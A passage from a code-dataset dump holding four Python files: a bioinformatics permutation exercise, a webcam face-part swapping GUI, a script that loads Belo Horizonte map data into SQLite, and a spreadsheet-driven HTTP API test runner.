heating('data.pl?ref=N39W105+1306+050263C')\n\n","sub_path":"practice_final2.py","file_name":"practice_final2.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"562589209","text":"# Exercise Break: How many permutations of length 200 have exactly 199 adjacencies?\n\n# Adjacency is defined as a adjacent pair in the permutation where the 2nd value is 1 ahead of the first: (n, n+1)\n# Do tests for smaller dimensions and try to pick out a pattern...\n\nfrom itertools import permutations, product\nfrom typing import List\n\nfrom helpers.Utils import slide_window\n\n\ndef count_adj(p: List[int]) -> int:\n return sum(1 if x1 + 1 == x2 else 0 for (x1, x2), _ in slide_window(p, 2))\n\n\ndef count_bp(p: List[int]) -> int:\n return sum(0 if x1 + 1 == x2 else 1 for (x1, x2), _ in slide_window(p, 2))\n\n\ndef test(count: int):\n found = set()\n for n in permutations(range(0, count + 2)): # instead of 1 to n, the chapter now says to make it 0 to n+1 where 0 and n+1 are implied AND fixed into place\n for signed_n in product(*([n[i], -n[i]] for i in range(len(n)))):\n if signed_n[0] != 0 or signed_n[-1] != count + 1: # 0 and n+1 must be fixed into place at first and last idx respectively\n continue\n adjs = count_adj(list(signed_n))\n if adjs == count - 1:\n found.add(signed_n)\n print(f'{len(found)} -- {found}')\n\n\ntest(3) # 6 -- {(0, 1, -3, -2, 4), (0, 1, 2, -3, 4), (0, -2, -1, 3, 4), (0, -3, -2, -1, 4), (0, 1, -2, 3, 4), (0, -1, 2, 3, 4)}\ntest(4) # 10 -- {(0, -4, -3, -2, -1, 5), (0, 1, 2, 3, -4, 5), (0, 1, -4, -3, -2, 5), (0, -2, -1, 3, 4, 5), (0, 1, -3, -2, 4, 5), (0, -1, 2, 3, 4, 5), (0, 1, 2, -3, 4, 5), (0, -3, -2, -1, 4, 5), (0, 1, 2, -4, -3, 5), (0, 1, -2, 3, 4, 5)}\ntest(5) # 15 -- {(0, 1, 2, 3, 4, -5, 6), (0, 1, 2, -3, 4, 5, 6), (0, -2, -1, 3, 4, 5, 6), (0, 1, -3, -2, 4, 5, 6), (0, 1, 2, 3, -5, -4, 6), (0, 1, 2, -5, -4, -3, 6), (0, -4, -3, -2, -1, 5, 6), (0, 1, 2, 3, -4, 5, 6), (0, -5, -4, -3, -2, -1, 6), (0, 1, -2, 3, 4, 5, 6), (0, -3, -2, -1, 4, 5, 6), (0, 1, 2, -4, -3, 5, 6), (0, -1, 2, 3, 4, 5, 6), (0, 1, -5, -4, -3, -2, 6), (0, 1, -4, -3, -2, 5, 6)}\n\n# The pattern seems to be for n, n+n-1+n-2+...+1 3 it's 3 + 1. So for 100, ...:\nprint(f'{sum(range(1, 200 + 1))}') # 20100\n","sub_path":"docs/data/learn/Bioinformatics/input/ch6_code/src/Stepik.6.5.ExerciseBreak.PermutationsOfLength200With199Adjacencies.py","file_name":"Stepik.6.5.ExerciseBreak.PermutationsOfLength200With199Adjacencies.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"380249367","text":"from PIL import Image, ImageTk\nimport tkinter as tkinter\nimport numpy\nfrom datetime import datetime\nimport cv2\nfrom imutils import resize\nimport Settings\nimport ImageProcessor\nfrom Society import Society\nfrom Person import Person\nfrom Feelings import Crowdedness\nfrom Feelings import Loneliness\nfrom imutils.video import WebcamVideoStream\n\ncv2.namedWindow(\"MultipersonD\", cv2.WINDOW_KEEPRATIO)\n#cv2.setWindowProperty(\"MultipersonD\", cv2.WND_PROP_ASPECTRATIO, cv2.WINDOW_KEEPRATIO)\n\nclass MultipersonD:\n def __init__(self):\n print(cv2.useOptimized())\n #self.video_Capture = WebcamVideoStream(src=0, name =\"s\") # capture video frames, 0 is your default video camera\n # self.video_Capture.stream.set(3, 1280)\n #self.video_Capture.stream.set(4, 720)\n #print(\"Resolution: {}x{}\".format(self.video_Capture.stream.get(3), self.video_Capture.stream.get(4)))\n\n #self.video_Capture.start()\n self.video_Capture = cv2.VideoCapture(0)\n print(\"Resolution: {}x{}\".format(self.video_Capture.get(3), self.video_Capture.get(4)))\n self.current_image = None # current image from the camera\n\n # Storage\n self.society = Society('../data/*.jpg')\n\n \"\"\" GUI \"\"\"\n self.main_window = tkinter.Tk() # initialize root window\n self.main_window.title(\"Multiperson D\") # set window title\n # self.destructor function gets fired when the window is closed\n self.main_window.protocol('WM_DELETE_WINDOW', self.destructor)\n\n self.is_fullscreen = False\n self.main_window.bind(\"\", self.toggle_fullscreen)\n\n self.pn_settings = tkinter.Label(self.main_window) # initialize image panel\n self.pn_settings.pack(side='left')\n\n \"\"\" resolution \"\"\"\n self.gr_resolution = tkinter.LabelFrame(self.pn_settings, text=\"Resolution\")\n self.gr_resolution.pack(fill=\"both\", expand=False)\n\n self.pn_resolution_options = tkinter.Label(self.gr_resolution) # initialize image panel\n self.pn_resolution_options.pack(fill=\"both\", expand=False)\n\n self.resolution_value = tkinter.StringVar()\n self.resolution_value.set(\"640x480\") # initialize\n\n for text, mode in Settings.RESOLUTION_MODES:\n b = tkinter.Radiobutton(self.pn_resolution_options, text=text, variable=self.resolution_value, value=mode)\n b.pack(side='left')\n\n self.lbl_resolution = tkinter.Label(self.gr_resolution, text=\"none\")\n self.lbl_resolution.pack(side='bottom')\n\n self.chk_mirror_value = tkinter.IntVar()\n self.chk_mirror_value.set(Settings.MIRROR) # set check state\n chk_mirror = tkinter.Checkbutton(self.gr_resolution, text='Mirror', var=self.chk_mirror_value)\n chk_mirror.pack(side='left')\n\n self.chk_rotate_value = tkinter.IntVar()\n self.chk_rotate_value.set(Settings.ROTATE) # set check state\n chk_rotate = tkinter.Checkbutton(self.gr_resolution, text='Rotate', var=self.chk_rotate_value)\n chk_rotate.pack(side='left')\n\n \"\"\" FACE PARTS \"\"\"\n self.gr_face_parts = tkinter.LabelFrame(self.pn_settings, text=\"Face parts\")\n self.gr_face_parts.pack(fill=\"both\", expand=False)\n\n self.pn_brows = tkinter.Label(self.gr_face_parts) # initialize image panel\n self.pn_brows.pack(fill=\"both\", expand=False)\n\n self.chk_left_brow_value = tkinter.IntVar()\n self.chk_left_brow_value.set(Settings.SWAP_LEFT_BROW) # set check state\n chk_left_brow = tkinter.Checkbutton(self.pn_brows, text='Left Brow', var=self.chk_left_brow_value)\n chk_left_brow.pack(side='left')\n\n self.chk_right_brow_value = tkinter.IntVar()\n self.chk_right_brow_value.set(Settings.SWAP_RIGHT_BROW) # set check state\n chk_right_brow = tkinter.Checkbutton(self.pn_brows, text='Right Brow', var=self.chk_right_brow_value)\n chk_right_brow.pack(side='left')\n\n self.pn_eyes = tkinter.Label(self.gr_face_parts) # initialize image panel\n self.pn_eyes.pack(fill=\"both\", expand=False)\n\n self.chk_swap_left_eye_value = tkinter.IntVar()\n self.chk_swap_left_eye_value.set(Settings.SWAP_LEFT_EYE) # set check state\n chk_swap_left_eye = tkinter.Checkbutton(self.pn_eyes, text='Left Eye', var=self.chk_swap_left_eye_value)\n chk_swap_left_eye.pack(side='left')\n\n self.chk_swap_right_eye_value = tkinter.IntVar()\n self.chk_swap_right_eye_value.set(Settings.SWAP_RIGHT_EYE) # set check state\n chk_swap_right_eye = tkinter.Checkbutton(self.pn_eyes, text='Right Eye', var=self.chk_swap_right_eye_value)\n chk_swap_right_eye.pack(side='left')\n\n self.cheeks_panel = tkinter.Label(self.gr_face_parts) # initialize image panel\n self.cheeks_panel.pack(fill=\"both\", expand=False)\n\n self.chk_swap_left_cheek_value = tkinter.IntVar()\n self.chk_swap_left_cheek_value.set(Settings.SWAP_LEFT_CHEEK) # set check state\n chk_swap_left_cheek = tkinter.Checkbutton(self.cheeks_panel, text='Left Cheek', var=self.chk_swap_left_cheek_value)\n chk_swap_left_cheek.pack(side='left')\n\n self.chk_swap_right_cheek_value = tkinter.IntVar()\n self.chk_swap_right_cheek_value.set(Settings.SWAP_RIGHT_CHEEK) # set check state\n chk_swap_right_cheek = tkinter.Checkbutton(self.cheeks_panel, text='Right Cheek', var=self.chk_swap_right_cheek_value)\n chk_swap_right_cheek.pack(side='left')\n\n self.other_parts_panel = tkinter.Label(self.gr_face_parts) # initialize image panel\n self.other_parts_panel.pack(fill=\"both\", expand=False)\n\n self.chk_swap_nose_value = tkinter.IntVar()\n self.chk_swap_nose_value.set(Settings.SWAP_NOSE) # set check state\n chk_swap_nose = tkinter.Checkbutton(self.other_parts_panel, text='Nose', var=self.chk_swap_nose_value)\n chk_swap_nose.pack(side='left')\n\n self.chk_swap_mouth_value = tkinter.IntVar()\n self.chk_swap_mouth_value.set(Settings.SWAP_MOUTH) # set check state\n chk_swap_mouth = tkinter.Checkbutton(self.other_parts_panel, text='Mouth', var=self.chk_swap_mouth_value)\n chk_swap_mouth.pack(side='left')\n\n self.chk_swap_face_value = tkinter.IntVar()\n self.chk_swap_face_value.set(Settings.SWAP_FACE) # set check state\n chk_swap_face = tkinter.Checkbutton(self.other_parts_panel, text='Forehead', var=self.chk_swap_face_value)\n chk_swap_face.pack(side='left')\n\n \"\"\"DEBUG\"\"\"\n self.debug_group = tkinter.LabelFrame(self.pn_settings, text=\"Debug\")\n self.debug_group.pack(fill=\"both\", expand=False)\n\n self.scale = tkinter.Scale(self.debug_group, from_=10, to=100, tickinterval=10, orient='horizontal')\n self.scale.set(int(Settings.SCALE_FACTOR*100))\n self.scale.pack(fill=\"both\", expand=True)\n\n self.chk_detect_faces_value = tkinter.IntVar()\n self.chk_detect_faces_value.set(Settings.DETECT_FACES) # set check state\n chk_detect_faces = tkinter.Checkbutton(self.debug_group, text='Detect Faces', var=self.chk_detect_faces_value)\n chk_detect_faces.pack(side='left')\n\n self.chk_demo_mode_value = tkinter.IntVar()\n self.chk_demo_mode_value.set(Settings.DEMO_MODE) # set check state\n chk_demo_mode = tkinter.Checkbutton(self.debug_group, text='Demo Mode', var=self.chk_demo_mode_value)\n chk_demo_mode.pack(side='left')\n\n self.lbl_random = tkinter.Label(self.debug_group, text=\"Random Duration\")\n self.lbl_random.pack(side=\"left\")\n\n self.random_face_duration = tkinter.Scale(self.debug_group, from_=1, to=100, tickinterval=10, orient='horizontal')\n self.random_face_duration.set(Settings.RANDOM_FACE_DURATION)\n self.random_face_duration.pack(fill=\"both\", expand=True)\n\n \"\"\"MASK\"\"\"\n self.mask_group = tkinter.LabelFrame(self.pn_settings, text=\"Mask\")\n self.mask_group.pack(side='left')\n\n self.lbl_pad_x = tkinter.Label(self.mask_group, text=\"Pad X\")\n self.lbl_pad_x.pack(fill=\"both\", expand=True)\n\n self.mask_pad_x = tkinter.Scale(self.mask_group, from_=0, to=100, tickinterval=10, orient='horizontal')\n self.mask_pad_x.set(Settings.MASK_PAD_X)\n self.mask_pad_x.pack(fill=\"both\", expand=False)\n\n self.mask_pad_x_minus = tkinter.Scale(self.mask_group, from_=0, to=100, tickinterval=10, orient='horizontal')\n self.mask_pad_x_minus.set(Settings.MASK_PAD_X_MINUS)\n self.mask_pad_x_minus.pack(fill=\"both\", expand=True)\n\n self.lbl_pad_y = tkinter.Label(self.mask_group, text=\"Pad Y\")\n self.lbl_pad_y.pack(fill=\"both\", expand=True)\n\n self.mask_pad_y = tkinter.Scale(self.mask_group, from_=0, to=100, tickinterval=10, orient='horizontal')\n self.mask_pad_y.set(Settings.MASK_PAD_Y)\n self.mask_pad_y.pack(fill=\"both\", expand=True)\n\n self.mask_pad_y_minus = tkinter.Scale(self.mask_group, from_=0, to=100, tickinterval=10, orient='horizontal')\n self.mask_pad_y_minus.set(Settings.MASK_PAD_Y_MINUS)\n self.mask_pad_y_minus.pack(fill=\"both\", expand=True)\n\n self.chk_feather_mask_value = tkinter.IntVar()\n self.chk_feather_mask_value.set(Settings.FEATHER_MASK) # set check state\n chk_feather_mask = tkinter.Checkbutton(self.mask_group, text='Feather mask', var=self.chk_feather_mask_value)\n chk_feather_mask.pack(side=\"left\")\n\n self.mask_feather = tkinter.Scale(self.mask_group, from_=1, to=100, tickinterval=10, orient='horizontal')\n self.mask_feather.set(Settings.FEATHER_AMOUNT)\n self.mask_feather.pack(fill=\"both\", expand=True)\n\n \"\"\"Colors\"\"\"\n self.colors_group = tkinter.LabelFrame(self.pn_settings, text=\"Colors\")\n self.colors_group.pack(side='left')\n\n self.chk_correct_colors_value = tkinter.IntVar()\n self.chk_correct_colors_value.set(Settings.CORRECT_COLORS) # set check state\n chk_correct_colors = tkinter.Checkbutton(self.colors_group, text='Correct Colors', var=self.chk_correct_colors_value)\n chk_correct_colors.pack(side='left')\n\n self.color_blur = tkinter.Scale(self.colors_group, from_=1, to=100, tickinterval=10, orient='horizontal')\n self.color_blur.set(Settings.COLOUR_CORRECT_BLUR_FRAC*100)\n self.color_blur.pack(fill=\"both\", expand=True)\n\n self.chk_blur_result_value = tkinter.IntVar()\n self.chk_blur_result_value.set(Settings.BLUR_RESULT) # set check state\n chk_blur_result = tkinter.Checkbutton(self.colors_group, text='Blur result',\n var=self.chk_blur_result_value)\n chk_blur_result.pack(side='left')\n\n self.blur_result_amount = tkinter.Scale(self.colors_group, from_=1, to=100, tickinterval=10, orient='horizontal')\n self.blur_result_amount.set(Settings.BLUR_RESULT_AMOUNT)\n self.blur_result_amount.pack(fill=\"both\", expand=True)\n\n \"\"\" Apply button \"\"\"\n btn = tkinter.Button(self.pn_settings, text=\"Apply Settings\", command=self.apply_settings)\n btn.pack(fill=\"both\", expand=True)\n\n self.lbl_fps = tkinter.Label(self.gr_resolution, text=\"none\")\n self.lbl_fps.pack(side='bottom')\n\n self.demo_frame = resize(self.society.persons[1].image, height=480)\n # start a self.video_loop that constantly pools the video sensor\n # for the most recently read frame\n self.video_loop()\n\n def video_loop(self):\n loop_start_time = datetime.now()\n print(\"!!!!!!!!!!!!!!!!!!!!!!!\")\n \"\"\" Get frame from the video stream and show it in Tkinter \"\"\"\n self.society.create_random_setting()\n\n ok, frame = self.video_Capture.read() # read frame from video stream\n if ok: # frame captured without any errors\n if Settings.MIRROR:\n frame = cv2.flip(frame, +1)\n if Settings.ROTATE:\n frame = cv2.rotate(frame, rotateCode=cv2.ROTATE_90_COUNTERCLOCKWISE)\n if Settings.DETECT_FACES:\n try:\n if(Settings.DEMO_MODE):\n frame = self.demo_frame\n frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n frame_face = ImageProcessor.get_landmarks(frame_gray)\n start_time = datetime.now()\n\n self.face = Person(frame, frame_gray, frame_face, False)\n\n self.society.interact(self.face)\n result = self.face.image\n\n end_time = datetime.now()\n delta = end_time - start_time\n print(\"SWAP: {}\".format(delta.total_seconds()))\n\n except Loneliness:\n result = frame\n #result = cv2.stylization(frame, sigma_s=20, sigma_r=0.001)\n #result = cv2.detailEnhance(frame, sigma_s=10, sigma_r=0.15)\n #result = numpy.zeros(frame.shape[:2], dtype=frame.dtype)\n #result = numpy.array([result, result, result]).transpose((1, 2, 0))\n except Crowdedness:\n result = frame\n else:\n result = frame\n if Settings.BLUR_RESULT == 1:\n result = cv2.medianBlur(result, Settings.BLUR_RESULT_AMOUNT)\n cv2.imshow(\"MultipersonD\", result)\n\n loop_end_time = datetime.now()\n delta = loop_end_time - loop_start_time\n if delta.total_seconds() > 0:\n self.lbl_fps.config(text=\"FPS: {}\".format(1/delta.total_seconds()))\n\n self.lbl_resolution.config(text=\"Real Resolution: {}x{}\".format(self.video_Capture.get(3), self.video_Capture.get(4)))\n print(\"???????????????????????????\")\n self.main_window.after(10, self.video_loop) # call the same function after 30 milliseconds\n\n def apply_settings(self):\n Settings.SWAP_RIGHT_CHEEK = self.chk_swap_right_cheek_value.get()\n Settings.SWAP_LEFT_CHEEK = self.chk_swap_left_cheek_value.get()\n Settings.SWAP_RIGHT_BROW = self.chk_right_brow_value.get()\n Settings.SWAP_LEFT_EYE = self.chk_swap_left_eye_value.get()\n Settings.SWAP_RIGHT_EYE = self.chk_swap_right_eye_value.get()\n Settings.SWAP_NOSE = self.chk_swap_nose_value.get()\n Settings.SWAP_MOUTH = self.chk_swap_mouth_value.get()\n Settings.SWAP_LEFT_BROW = self.chk_left_brow_value.get()\n Settings.SWAP_FACE = self.chk_swap_face_value.get()\n\n Settings.DETECT_FACES = self.chk_detect_faces_value.get()\n Settings.SCALE_FACTOR = self.scale.get()/100\n Settings.DEMO_MODE = self.chk_demo_mode_value.get()\n Settings.RANDOM_FACE_DURATION = self.random_face_duration.get()\n\n resolution = self.resolution_value.get()\n if resolution != Settings.RESOLUTION:\n self.set_resolution(resolution)\n\n f = self.mask_feather.get()\n if f % 2 == 0:\n f = f+1\n Settings.FEATHER_AMOUNT = f\n\n Settings.FEATHER_MASK = self.chk_feather_mask_value.get()\n Settings.MASK_PAD_X = self.mask_pad_x.get()\n Settings.MASK_PAD_Y = self.mask_pad_y.get()\n Settings.MASK_PAD_X_MINUS = self.mask_pad_x_minus.get()\n Settings.MASK_PAD_Y_MINUS = self.mask_pad_y_minus.get()\n\n Settings.CORRECT_COLORS = self.chk_correct_colors_value.get()\n Settings.COLOUR_CORRECT_BLUR_FRAC = self.color_blur.get() / 100\n\n Settings.BLUR_RESULT = self.chk_blur_result_value.get()\n b = self.blur_result_amount.get()\n if b % 2 == 0:\n b = b + 1\n\n Settings.BLUR_RESULT_AMOUNT = b\n\n Settings.MIRROR = self.chk_mirror_value.get()\n Settings.ROTATE = self.chk_rotate_value.get()\n\n def set_resolution(self, resolution):\n self.video_Capture.release()\n self.video_Capture = cv2.VideoCapture(0)\n if resolution == \"160x120\":\n self.video_Capture.set(3, 160)\n self.video_Capture.set(4, 120)\n elif resolution == \"176x144\":\n self.video_Capture.set(3, 176)\n self.video_Capture.set(4, 144)\n elif resolution == \"320x240\":\n self.video_Capture.set(3, 320)\n self.video_Capture.set(4, 240)\n elif resolution == \"352x288\":\n self.video_Capture.set(3, 352)\n self.video_Capture.set(4, 288)\n elif resolution == \"640x480\":\n self.video_Capture.set(3, 640)\n self.video_Capture.set(4, 480)\n elif resolution == \"800x600\":\n self.video_Capture.set(3, 800)\n self.video_Capture.set(4, 600)\n elif resolution == \"1024x768\":\n self.video_Capture.set(3, 1024)\n self.video_Capture.set(4, 768)\n elif resolution == \"1280x1024\":\n self.video_Capture.set(3, 1280)\n self.video_Capture.set(4, 1024)\n\n Settings.RESOLUTION = resolution\n\n def toggle_fullscreen(self, event=None):\n self.is_fullscreen = not self.is_fullscreen # Just toggling the boolean\n\n if self.is_fullscreen:\n cv2.setWindowProperty(\"MultipersonD\", cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)\n else:\n cv2.setWindowProperty(\"MultipersonD\", cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_NORMAL)\n\n return \"break\"\n\n def destructor(self):\n \"\"\" Destroy the root object and release all resources \"\"\"\n print(\"[INFO] closing...\")\n self.main_window.destroy()\n self.video_Capture.release()\n #self.video_Capture.stop();\n # release web camera\n cv2.destroyAllWindows() # it is not mandatory in this application\n\n\n# start the app\nprint(\"[INFO] starting...\")\nmultipersonD = MultipersonD()\nmultipersonD.main_window.mainloop()\n","sub_path":"src/scripts/MultipersonD.py","file_name":"MultipersonD.py","file_ext":"py","file_size_in_byte":17699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"247884208","text":"from bhmap_database import *\nimport sys\nimport os\nimport urllib.request as request\nfrom pprint import pprint\nimport json\nimport codecs\nimport sqlite3 as sl\n\nappdata_path = './'\n\ndef main(argc, argv):\n srsName = 'EPSG:4326'\n quadras = get_bhmap_data(featureName='ide_bhgeo:QUADRA_CTM', local=True, srsName=srsName)['features']\n conn = sl.connect('BHMap.db')\n c = conn.cursor()\n\n #c.execute('CREATE TABLE quadras (codigo integer, id integer, status text)')\n for q in quadras:\n codigo = int(q['properties']['CODIGO'])\n id = int(q['properties']['ID'])\n status = q['properties']['STATUS']\n print(codigo, id)\n c.execute(\"INSERT INTO quadras VALUES ({:d}, {:d}, '{:s}')\".format(codigo, id, status))\n \n conn.commit()\n conn.close()\n\nif __name__ == '__main__':\n main(len(sys.argv), sys.argv)\n sys.exit()\n \ndef get_bhmap_data(featureName, properties=None, sortBy=None, cql_filter=None, local=False, bbox=None, srsName='EPSG:4326'):\n url_part1 = 'http://bhmap-hm.pbh.gov.br/v2/api/wfs?service=WFS&version=2.0.0'\n url_part2 = \"&request=GetFeature&typeName={:s}&srsName={:s}&outputFormat=application%2Fjson\".format(featureName, srsName)\n if properties:\n url_part2 = url_part2 + '&propertyName={:s}'.format(properties[0])\n for i in range(1, len(properties)):\n url_part2 = url_part2 + ',' + properties[i]\n if sortBy:\n url_part2 = url_part2 + '&sortBy={:s}'.format(sortBy)\n if bbox:\n url_part2 = url_part2 + '&BBox={:.8f},{:.8f},{:.8f},{:.8f}'.format(bbox[0],\\\n bbox[1],\\\n bbox[2],\\\n bbox[3])\n if cql_filter:\n url_part2 = url_part2 + '&cql_filter=' + cql_filter\n \n url = url_part1 + url_part2\n\n if local:\n extension = '.json'\n filename = \"\"\n for c in url_part2: \n if c.isalnum(): filename += c\n filepath = appdata_path + 'bhmap/' + filename + extension\n \n if not os.path.isfile(filepath):\n res = request.urlopen(url)\n response = res.read()\n print(res.geturl())\n print(res.info())\n sys.stdout.flush()\n j = json.loads(response.decode('utf8'))\n file = open(filepath, 'w')\n json.dump(j, file, sort_keys=True, indent=4)\n return j\n else:\n file = open(filepath, 'r')\n return json.load(file)\n else:\n res = request.urlopen(url)\n response = res.read()\n print(res.geturl())\n print(res.info())\n sys.stdout.flush()\n return json.loads(response.decode('utf8'))\n \n","sub_path":"code/python/bhmapdb/bhmap_database.py","file_name":"bhmap_database.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"531474652","text":"#!/usr/bin/env python\n# coding=utf-8\n\nimport json\nimport http.client,mimetypes\nfrom urllib.parse import urlencode\nimport random\nimport time\nimport re\nimport logging\nimport os,sys\nimport xlrd\nfrom pyDes import *\nimport hashlib\nimport base64\nimport smtplib\nfrom email.mime.text import MIMEText\n\n\n\n# # 打印日志\n# log_file = os.path.join(os.getcwd(),'log/liveappapi.log')\n# log_format = '[%(asctime)s] [%(levelname)s] %(message)s'\n# logging.basicConfig(format=log_format,filename=log_file,filemode='w',level=logging.DEBUG)\n# console = logging.StreamHandler()\n# console.setLevel(logging.DEBUG)\n# formatter = logging.Formatter(log_format)\n# console.setFormatter(formatter)\n# logging.getLogger('').addHandler(console)\n\n\n# 反转字典的键和值\ndef invert_dict(d):\n return dict((v, k) for k, v in d.iteritems())\n\n\n# 获取用例并执行测试用例\ndef runTest(testCase_file, sheet_name):\n # 读取文件\n testCaseFile = os.path.join(os.getcwd(), testCase_file)\n if not os.path.exists(testCaseFile):\n logging.error('测试用例文件不存在!!!')\n sys.exit()\n testCase = xlrd.open_workbook(testCaseFile)\n # 读取第一个sheet\n table = testCase.sheet_by_name(sheet_name)\n # 初始化失败case\n errorCase = []\n correlationDict = {}\n correlationDict['${hashPassword}'] = hash1Encode('123456')\n correlationDict['${session}'] = None\n\n # 将列名组装成字典(列名为键,列数为值)\n row_name = table.row_values(1)\n row_val = []\n for i in range(0, len(row_name)):\n row_val.append(i)\n # 将row_name、row_val两个列表组合成字典\n rows = dict(zip(row_name, row_val))\n\n for i in range(2, table.nrows):\n correlationDict['${randomEmail}'] = ''.join(random.sample('abcdefghijklmnopqrstuvwxyz', 6)) + '@automation.test'\n correlationDict['${randomTel}'] = '186' + str(random.randint(10000000, 99999999))\n correlationDict['${timestamp}'] = int(time.time())\n if table.cell(i, rows['Active']).value.replace('\\n', '').replace('\\r', '') != 'Yes':\n continue\n request_url = table.cell(i, rows['Request URL']).value.replace('\\n', '').replace('\\r', '')\n num = table.cell(i, rows['No.']).value.replace('\\n', '').replace('\\r', '')\n if request_url == '' or num == '':\n print('sth empty')\n continue\n api_purpose = table.cell(i, rows['API Purpose']).value.replace('\\n', '').replace('\\r', '')\n api_host = table.cell(i, rows['API Host']).value.replace('\\n', '').replace('\\r', '')\n\n request_method = table.cell(i, rows['Request Method']).value.replace('\\n', '').replace('\\r', '')\n request_data_type = table.cell(i, rows['Request Data Type']).value.replace('\\n', '').replace('\\r', '')\n request_data = table.cell(i, rows['Request Data']).value.replace('\\n', '').replace('\\r', '')\n encryption = table.cell(i, rows['Encryption']).value.replace('\\n', '').replace('\\r', '')\n check_point = table.cell(i, rows['Check Point']).value\n correlation = table.cell(i, rows['Correlation']).value.replace('\\n', '').replace('\\r', '').split(';')\n isContains = table.cell(i, rows['isContains']).value.replace('\\n', '').replace('\\r', '')\n for key in correlationDict:\n if request_url.find(key) > 0:\n request_url = request_url.replace(key, str(correlationDict[key]))\n if request_data_type == 'Form':\n dataFile = request_data\n if os.path.exists(dataFile):\n fopen = open(dataFile, encoding='utf-8')\n request_data = fopen.readline()\n fopen.close()\n for keyword in correlationDict:\n if request_data.find(keyword) > 0:\n request_data = request_data.replace(keyword, str(correlationDict[keyword]))\n try:\n if encryption == 'MD5':\n request_data = json.loads(request_data)\n status, md5 = getMD5(api_host, urlencode(request_data).replace(\"%27\", \"%22\"))\n if status != 200:\n logging.error(num + ' ' + api_purpose + \"[ \" + str(status) + \" ], 获取md5验证码失败!!!\")\n continue\n request_data = dict(request_data, **{\"sign\": md5.decode(\"utf-8\")})\n request_data = urlencode(request_data).replace(\"%27\", \"%22\")\n elif encryption == 'DES':\n request_data = json.loads(request_data)\n request_data = urlencode({'param': encodePostStr(request_data)})\n else:\n request_data = urlencode(json.loads(request_data))\n except Exception as e:\n logging.error(num + ' ' + api_purpose + ' 请求的数据有误,请检查[Request Data]字段是否是标准的json格式字符串!')\n continue\n elif request_data_type == 'Data':\n dataFile = request_data\n if os.path.exists(dataFile):\n fopen = open(dataFile, encoding='utf-8')\n request_data = fopen.readline()\n fopen.close()\n for keyword in correlationDict:\n if request_data.find(keyword) > 0:\n request_data = request_data.replace(keyword, str(correlationDict[keyword]))\n request_data = request_data.encode('utf-8')\n elif request_data_type == 'File':\n dataFile = request_data\n if not os.path.exists(dataFile):\n logging.error(num + ' ' + api_purpose\n + ' 文件路径配置无效,请检查[Request Data]字段配置的文件路径是否存在!!!')\n continue\n fopen = open(dataFile, 'rb')\n data = fopen.read()\n fopen.close()\n request_data = '''\n ------WebKitFormBoundaryDf9uRfwb8uzv1eNe\n Content-Disposition:form-data;name=\"file\";filename=\"%s\"\n Content-Type:\n Content-Transfer-Encoding:binary\n %s\n ------WebKitFormBoundaryDf9uRfwb8uzv1eNe--\n ''' % (os.path.basename(dataFile), data)\n status, resp = interfaceTest(num, api_purpose, api_host, request_url, request_data, check_point, request_method,\n request_data_type, correlationDict['${session}'], isContains)\n # 判断请求结果\n if status != 200:\n errorCase.append((num + ' ' + api_purpose, str(status), 'http://' + api_host + request_url, resp))\n continue\n for j in range(len(correlation)):\n param = correlation[j].split('=')\n if len(param) == 2:\n if param[1] == '' or not re.search(r'^\\[', param[1]) or not re.search(r'\\]$', param[1]):\n logging.error(num + ' ' + api_purpose + ' 关联参数设置有误,请检查[Correlation]字段参数格式是否正确!!!')\n continue\n value = resp\n for key in param[1][1:-1].split(']['):\n try:\n temp = value[int(key)]\n except:\n try:\n temp = value[key]\n except:\n break\n value = temp\n correlationDict[param[0]] = value\n return errorCase\n\n\n# 接口测试\ndef interfaceTest(num, api_purpose, api_host, request_url, request_data, check_point, request_method, request_data_type,\n session,isContains):\n headers = {'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',\n 'X-Requested-With': 'XMLHttpRequest',\n 'Connection': 'keep-alive',\n 'CLIENT': 'WEB',\n 'Referer': 'http://' + api_host,\n 'sign': 'AAA',\n 'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1'}\n if session is not None:\n headers['Cookie'] = 'session=' + session\n if request_data_type == 'File':\n headers[\n 'Content-Type'] = 'multipart/form-data;boundary=----WebKitFormBoundaryDf9uRfwb8uzv1eNe;charset=UTF-8'\n elif request_data_type == 'Data':\n headers['Content-Type'] = 'text/plain; charset=UTF-8'\n\n conn = http.client.HTTPConnection(api_host)\n if request_method == 'POST':\n conn.request('POST', request_url, request_data, headers=headers)\n elif request_method == 'GET':\n conn.request('GET', request_url + '?' + request_data, headers=headers)\n else:\n logging.error(num + ' ' + api_purpose + ' HTTP请求方法错误,请确认[Request Method]字段是否正确!!!')\n return 400, request_method\n response = conn.getresponse()\n status = response.status\n resp = response.read()\n if status == 200:\n resp = resp.decode('utf-8').replace('\\n\\t\\t', '').replace(' ', '')\n result = str(resp).find(check_point.replace(' ', ''))\n if result == 1 if isContains == 'Yes' else result == -1:\n logging.info(num + ' ' + api_purpose + ' 成功, ' + str(status) + ', ' + str(resp))\n return status, json.loads(resp)\n else:\n logging.error(num + ' ' + api_purpose + ' 操作失败!!!, [ ' + str(status) + ' ], ' + str(resp))\n return 2001, resp\n else:\n logging.error(num + ' ' + api_purpose + ' 请求失败!!!, [ ' + str(status) + ' ], ' + str(resp))\n return status, resp.decode('utf-8')\n\n\n# 获取md5验证码\ndef getMD5(url, postData):\n headers = {'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',\n 'X-Requested-With': 'XMLHttpRequest'}\n conn = http.client.HTTPConnection('this.ismyhost.com')\n conn.request('POST', '/get_isignature', postData, headers=headers)\n response = conn.getresponse()\n return response.status, response.read()\n\n\n# hash1加密\ndef hash1Encode(codeStr):\n hashobj = hashlib.sha1()\n hashobj.update(codeStr.encode('utf-8'))\n return hashobj.hexdigest()\n\n\n# 